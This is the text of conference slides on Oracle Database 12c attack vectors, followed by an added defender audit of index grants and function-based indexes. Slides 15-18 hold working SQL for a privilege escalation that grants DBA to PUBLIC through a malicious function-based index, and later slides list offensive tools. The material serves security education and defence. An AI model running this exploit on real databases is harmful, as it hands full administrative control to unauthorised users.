
Oracle Database 12c Attack Vectors

Presentation on Oracle 12c attack vectors at the BG OUG (http://www.bgoug.org/) summer conference, 3-5 June 2016

  1. 1. Oracle database 12c attack vectors Martin Toshev, BGOUG, 04.06.2016
  2. 2. Who am I • Software consultant (CoffeeCupConsulting) • BG JUG board member (http://jug.bg) • OpenJDK and Oracle RDBMS enthusiast
  3. 3. Who am I Author of Learning RabbitMQ
  4. 4. Agenda • Real world examples • Attack vectors • Attack discovery approach • Tools
  5. 5. Real world examples
  6. 6. Real world examples source: http://tech.firstpost.com/news-analysis/oracles-database-secure-even-nsa-cant-hack-us-say-larry-ellison-217341.html, 30 Jan, 2014
  7. 7. Real world examples However …
  8. 8. Real world examples Source: http://www.cnet.com/news/oracle-databases-easy-to-hack-says-researcher/ "Disable the protocol in Version 11.1 and start using older versions like Version 10g," which is not vulnerable. They didn't fix the current version, which leaves 11.1 and 11.2 still susceptible to attacks.
  9. 9. Real world examples Source: http://www.joxeankoret.com/download/tnspoison.pdf/
  10. 10. Real world examples Source: http://www.itsec.gov.cn/webportal/download/2005_Search_Engine_Attack_Database.pdf Simple example: 1) https://www.google.ca/advanced_search 2) search for ‘/isqlplus’ and specify 'URL only' 3) voila
  11. 11. Real world examples Source: http://thehackernews.com/2014/08/Vulnerability-Oracle-Data-Redaction-Security.html
  12. 12. Real world examples Source: http://www.reuters.com/article/us-oracle-hackers-idUSTRE56L66D20090722 http://www.theinquirer.net/inquirer/news/1469225/oracle-databases-hacked-script-kiddies
  13. 13. Real world examples Source: http://www.dba-oracle.com/t_hackers_breaches_horror_stories.htm
  14. 14. Real world examples Source: http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf
  15. 15. Real world examples • Privilege escalation via indexes in 12c:
        -- from SYS: create c##autoexec user
        -- (the password is double-quoted because it starts with a digit)
        CREATE USER c##autoexec IDENTIFIED BY "123";
        GRANT CREATE SESSION TO c##autoexec;
        GRANT CREATE PROCEDURE TO c##autoexec;
        ALTER USER C##autoexec QUOTA 100M ON USERS;
        CREATE TABLE foo ( Id int );
        INSERT INTO sys.foo values (100);
        INSERT INTO sys.foo values (50);
        GRANT INDEX ON foo to c##autoexec;
        GRANT SELECT, INSERT ON foo TO c##autoexec;
  16. 16. Real world examples • Privilege escalation via indexes in 12c:
        -- from c##autoexec: attempt to set the DBA role - FAILS
        SET ROLE DBA;
  17. 17. Real world examples • Privilege escalation via indexes in 12c:
        -- from c##autoexec
        CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR
          DETERMINISTIC AUTHID CURRENT_USER IS
          PRAGMA AUTONOMOUS_TRANSACTION;
        BEGIN
          EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC';
          COMMIT;
          RETURN 'FOO';
        END;
  18. 18. Real world examples • Privilege escalation via indexes in 12c:
        -- from c##autoexec
        GRANT EXECUTE ON GETDBA TO public;
        CREATE INDEX EXPLOIT_INDEX ON SYS.FOO(C##AUTOEXEC.GETDBA(''));
        -- from SYSDBA
        SELECT * FROM sys.foo;
        -- from c##autoexec: SUCCESS
        SET ROLE DBA;
  19. 19. Attack vectors
  20. 20. Attack vectors • Let’s have a look at the high level architecture of the database …
  21. 21. Attack vectors (diagram labels: unauthorized • authorized (limited permissions) • authorized (SYSDBA) • OS level)
  22. 22. Attack vectors • Attack vectors can originate from different sources depending on the setup (we will abstract away from this criterion): – external (applications running publicly, vulnerable protocols running on the database servers, malware enabling machine access) – internal (employees with non-DBA access, DBAs, OS-level users)
  23. 23. Attack vectors • Attacks from unauthorized users: – reconnaissance: • looking for application servers and database tools running on the database publicly • using search engines to find Oracle directory indices, web apps (such as isqlplus) running publicly • port scanning for well known ports (such as 1521 for the TNS listener) on target machines
  24. 24. Attack vectors • Attacks from unauthorized users: – gaining access: • exploring misconfiguration - using default credentials • exploring lack of identity policy – password brute forcing • exploring security bugs (e.g. buffer overflow enabling arbitrary command execution on the TNS listener)
  25. 25. Attack vectors • Attacks from unauthorized users: – data theft: • exploring lack of encryption leading to man-in-the-middle attacks (e.g. TNS listener poisoning or eavesdropping) – DoS/DDoS attacks: • network level DoS (e.g. excessive packets) • buffer overflow DoS (e.g. bug in the TNS listener)
  26. 26. Attack vectors • Attacks from authorized users with limited permissions: – SQL injection (typically caused by buggy applications having a DB user with excessive privileges) – DoS attacks (e.g. due to misconfiguration – excessive connections, filling shared tablespaces, running complex queries)
  27. 27. Attack vectors • Attacks from authorized users with limited permissions: – privilege escalation (e.g. via the INDEX permission) – data theft (e.g. via PL/SQL procedure injection, scheduling opening of remote socket connections to external sources)
  28. 28. Attack vectors • SYSDBA access … the world is yours • OS level access – many methods to retrieve passwords and useful data from raw Oracle database files
  29. 29. Attack discovery approach
  30. 30. Attack discovery approach • Security bugs that have already been uncovered, such as the ones we discussed, are fixed by Oracle and released as critical patch updates • But how do we uncover new bugs and report them ethically before attackers discover them?
  31. 31. Attack discovery approach • Explore new features (e.g. multitenancy) • See what parts of the security architecture of the database are in use by these features • Explore changes to the security architecture and new security features
  32. 32. Attack discovery approach • For top 12c new features (at a glance): – consolidation (pluggable databases) – redaction policy
  33. 33. Attack discovery approach • For top 12c new features (at a glance): – consolidation (pluggable databases) – resource utilization of PDBs, access boundary between PDBs, secure data replication between PDBs, discrepancies in local/common users/roles ? – redaction policy – other built-in functions/mechanisms that can reveal redacted data ? (we already saw some)
  34. 34. Attack discovery approach • For top 12c new features (at a glance): – In Line PL/SQL Functions in SQL queries – Online Migration of Table Partition or Sub Partition
  35. 35. Attack discovery approach • For top 12c new features (at a glance): – In Line PL/SQL Functions in SQL queries – bypassing security mechanism, privilege escalation ? – Online Migration of Table Partition or Sub Partition – data theft ?
  36. 36. Attack discovery approach • For top 12c new features (at a glance): – Full Database Caching – SQL translation framework
  37. 37. Attack discovery approach • For top 12c new features (at a glance): – Full Database Caching – buffer overflows, DoS, malicious in-memory data manipulation ? – SQL translation framework – malicious third-party translation plug-ins, security bugs in translation plug-ins ?
  38. 38. Attack discovery approach • explore existing attacks and security bugs (e.g. use packet crafting tools to try buffer overflow attacks over enhancements of database protocols) • explore vulnerability databases such as CVE for exploits and try to adapt some of them to new database features
  39. 39. Attack discovery approach • make use of a proper penetration testing tool such as Metasploit to adapt existing attacks for 10g/11g or older versions to 12c • analyze new PL/SQL packages for security leaks • disassemble Oracle binaries
  40. 40. Attack discovery approach • You may, of course, discover issues not introduced in 12c but rather propagating through multiple versions (such as the TNS poison vulnerability) …
  41. 41. Tools
  42. 42. Tools • nmap • Metasploit • Tnscmd • ODAT (Oracle Database Attacking Tool) • w32dasm/ IDA Freeware • Kali Linux
  43. 43. Tools • ODAT supports 12.1.0.2.0: – try to find valid SIDs and credentials – try to escalate valid account to DBA or SYSDBA – try to execute OS commands from a valid account
  44. 44. Some readings that may bring ideas …
  45. 45. Some readings that may bring ideas …
  46. 46. Thank you ! Q&A
  47. 47. References • Oracle 12c Security whitepaper http://www.oracle.com/technetwork/database/security/security-compliance-wp-12c-1896112.pdf • Oracle Database 12c architecture overview https://www.youtube.com/watch?v=266ay9N6kAw • Oracle Database 12c New security Features http://www.trivadis.com/sites/default/files/downloads/soe_oracle_database_12_new_security_features_summary.pdf
  48. 48. References • Oracle Database 12c security http://docs.oracle.com/database/121/nav/portal_25.htm • Oracle database security checklist http://www.isaca.org/groups/professional-english/oracle-database/groupdocuments/twp-security-checklist-database-1-132870.pdf • Encryption and Redaction in Oracle Database 12c with Oracle Advanced Security http://www.oracle.com/technetwork/database/options/advanced-security/advanced-security-wp-12c-1896139.pdf
  49. 49. References • Privilege escalation via Oracle indexes http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf • Attacking Oracle with the Metasploit Framework http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf • Oracle Database TNS Listener Poison Attack http://www.joxeankoret.com/download/tnspoison.pdf
  50. 50. References • ODAT (Oracle Database Attacking Tool) https://github.com/quentinhardy/odat • Oracle Database 12c CVE vulnerabilities statistics https://www.cvedetails.com/product/467/Oracle-Database-Server.html?vendor_id=93 • Oracle Database 12c CVE vulnerabilities https://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id-467/cvssscoremin-5/cvssscoremax-5.99/Oracle-Database-Server.html
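
A defender-side audit for the index-based privilege escalation shown on slides 15-18, as an added example that is not part of the original presentation: it lists INDEX grants on tables the grantee does not own, function-based indexes whose owner differs from the table owner, and the holders of the DBA role. It assumes a session that can read the DBA_* data dictionary views; the clean-up statements use the object names from the slides.

```sql
-- Added example: audit queries, not code from the presentation.
-- Assumption: the session has SELECT on the DBA_* data dictionary views.

-- 1. Who holds the INDEX object privilege on a table they do not own?
--    On the slides, this grant on SYS.FOO is the starting point.
SELECT grantee, owner, table_name, grantor
FROM   dba_tab_privs
WHERE  privilege = 'INDEX'
AND    grantee <> owner
ORDER  BY owner, table_name, grantee;

-- 2. Function-based indexes created by a schema other than the table owner.
--    COLUMN_EXPRESSION shows the user function the index evaluates
--    (C##AUTOEXEC.GETDBA in EXPLOIT_INDEX on the slides).
SELECT i.owner       AS index_owner,
       i.index_name,
       i.table_owner,
       i.table_name,
       e.column_expression
FROM   dba_indexes i
JOIN   dba_ind_expressions e
       ON  e.index_owner = i.owner
       AND e.index_name  = i.index_name
WHERE  i.index_type LIKE 'FUNCTION-BASED%'
AND    i.owner <> i.table_owner
ORDER  BY i.table_owner, i.table_name;

-- 3. Holders of the DBA role. A row with GRANTEE = 'PUBLIC' means every
--    account can enable the role, which is the end state on slide 18.
SELECT grantee, admin_option, default_role
FROM   dba_role_privs
WHERE  granted_role = 'DBA'
ORDER  BY grantee;

-- 4. Clean-up for the example objects from the slides.
DROP INDEX c##autoexec.exploit_index;
REVOKE INDEX ON sys.foo FROM c##autoexec;
REVOKE DBA FROM PUBLIC;
```

Any row returned by query 2 for a SYS-owned table deserves review before the table is next queried or modified by a privileged account.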
